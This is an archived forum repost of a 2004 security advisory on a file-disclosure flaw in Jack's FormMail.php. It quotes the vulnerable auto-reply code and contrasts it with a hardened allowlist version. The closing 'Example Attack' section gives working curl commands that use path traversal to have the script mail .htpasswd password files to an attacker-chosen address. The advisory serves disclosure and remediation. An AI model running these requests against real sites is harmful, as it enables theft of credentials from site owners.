EvilOctal Information Security Team Technical Discussion Group's Archiver

EvilOctal 2005-1-4 06:26

[Repost] Jacks FormMail.php remote file access vulnerability

Source: securitytracker.com

Jacks FormMail.php remote file access vulnerability
Added by: A^C^E
Date: 03.01.05
Time: 10:01:10
Category: Advisories
Source: http://securitytracker.com/alerts/2005/Jan/1012747.html

Security Advisory

Vendor: Jack (Jack's Scripts)
Date: 31-Dec-2004
Script: FormMail.php
Site: http://dtheatre.com/scripts/formmail.php
Type: Remote
Severity: High
Version: 5.0 (maybe others)

Script Overview:

Jacks FormMail.php script is a simple PHP script that
allows web site owners to easily email form values to
themselves without much work or scripting knowledge.

Problem:

The script accepts an auto-reply variable (ar_file) naming a
file whose contents are mailed back to the person submitting
the form. The script takes this variable from the submitted
request rather than from its own configuration and checks only
that the file exists, so a submitter can point it at any file
the web server can read (relative paths such as ../../.htpasswd
included) and have its contents mailed to an address of their
choosing via the email field.

I found this vulnerability because someone used the
attack against a customer of mine. Because this is
being used in the wild, I'm posting immediately to
BUGTRAQ without waiting for Jack to fix the script.

Solution:

Remove the following code from the FormMail.php
script.
------------------------------------------------------
// $ar_file comes straight from the submitted form; there is no
// check on where the path points before the file is read.
if (file_exists($ar_file)) {
    $fd = fopen($ar_file, "rb");
    $ar_message = fread($fd, filesize($ar_file));
    fclose($fd);
    // The file contents are mailed to $email, also supplied by the submitter.
    mail_it($ar_message, ($ar_subject) ? stripslashes($ar_subject) : "RE: Form Submission",
            ($ar_from) ? $ar_from : $recipient, $email);
}
------------------------------------------------------
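The following is an added example, not code from FormMail.php or from the advisory. It puts the vulnerable lookup beside a hardened one in which the request can only select a key from a server-side allowlist; the resulting path is then canonicalised and confined to a fixed auto-reply directory before it is read. The function names, the autoreply directory and the sample files are assumptions for illustration.

```php
<?php
// Added example, not Jack's FormMail.php. Contrasts the vulnerable
// auto-reply lookup with a hardened version. Names below are assumed.

// Directory holding the only files an auto-reply may be read from (assumed).
define('AR_DIR', __DIR__ . '/autoreply');

// Vulnerable pattern, the shape of the code the advisory removes: the
// caller controls the whole path, and file_exists() accepts "../" and
// absolute paths alike, so any readable file can be returned.
function vulnerable_autoreply($ar_file)
{
    if (file_exists($ar_file)) {
        return file_get_contents($ar_file);
    }
    return null;
}

// Hardened lookup: the request supplies only a key into a server-side
// allowlist; the mapped file must resolve inside AR_DIR.
function safe_autoreply($ar_name)
{
    $allowed = array(
        'default' => 'thanks.txt',
        'sales'   => 'sales.txt',
    );
    if (!is_string($ar_name) || !isset($allowed[$ar_name])) {
        return null;
    }
    $base = realpath(AR_DIR);
    $path = realpath(AR_DIR . '/' . $allowed[$ar_name]);
    // realpath() resolves symlinks and "..", so the prefix check holds
    // even if a file under AR_DIR were later replaced by a link.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return file_get_contents($path);
}

// Demonstration with constructed files (not real credentials).
@mkdir(AR_DIR);
file_put_contents(AR_DIR . '/thanks.txt', "Thanks for your submission.\n");
$secret = sys_get_temp_dir() . '/htpasswd.demo';
file_put_contents($secret, 'admin:$apr1$fake$hash' . "\n");

printf("vulnerable, attacker path: %s\n",
       vulnerable_autoreply($secret) === null ? 'blocked' : 'LEAKED');
printf("hardened, attacker path:   %s\n",
       safe_autoreply($secret) === null ? 'blocked' : 'LEAKED');
printf("hardened, traversal key:   %s\n",
       safe_autoreply('../../.htpasswd') === null ? 'blocked' : 'LEAKED');
printf("hardened, allowed key:     %s\n",
       safe_autoreply('default') === null ? 'blocked' : 'served');
```

Run it with `php` from a directory the web server user can write to; the vulnerable function returns the constructed secret because the path exists, while the hardened one returns null for anything that is not an allowlisted key. Removing the auto-reply block entirely, as the advisory recommends, is the simpler fix if the feature is not needed.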

Example Attack:

Assume the following:
Script Location : http://yoursite.com/cgi-bin/formmail.php
Password File Location : http://yoursite.com/members/.htpasswd

Use the following curl command to have the password file emailed to you.

# curl -e http://yoursite.com/ -d ar_file=../members/.htpasswd \
    -d email=you@yoursite.com http://yoursite.com/cgi-bin/formmail.php

Depending on file permissions, a .htpasswd outside the document
root can be read as well: the path is checked with file_exists()
on the server filesystem, so a relative path can climb past the
web root, as in the following example.

# curl -e http://yoursite.com/ -d ar_file=../../.htpasswd \
    -d email=you@yoursite.com http://yoursite.com/cgi-bin/formmail.php

© 1999-2008 EvilOctal Security Team